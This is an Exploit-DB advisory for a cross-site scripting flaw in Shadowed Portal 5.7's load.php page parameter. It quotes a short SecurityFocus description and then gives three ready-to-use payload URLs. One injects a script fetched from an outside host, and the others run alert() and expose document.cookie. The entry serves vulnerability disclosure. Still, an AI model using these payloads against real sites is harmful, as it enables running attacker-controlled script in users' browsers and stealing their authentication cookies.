Shadowed Portal 5.7 - 'Load.php' Cross-Site Scripting

EDB-ID:

27591


Author:

Liz0ziM

Type:

webapps


Platform:

PHP

Date:

2006-04-10


source: https://www.securityfocus.com/bid/17430/info

Shadowed Portal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

All versions of Shadowed Portal are considered vulnerable at the moment.

http://www.example.com/path/load.php?mod=pages&page="><script src=http://liz0.li.funpic.org/hacked.js></script>

http://www.example.com/path/load.php?mod=pages&page="><script>alert(/BiyoSecurityTeam/)</script>

http://www.example.com/path/load.php?mod=pages&page="><script>alert(document.cookie)</script>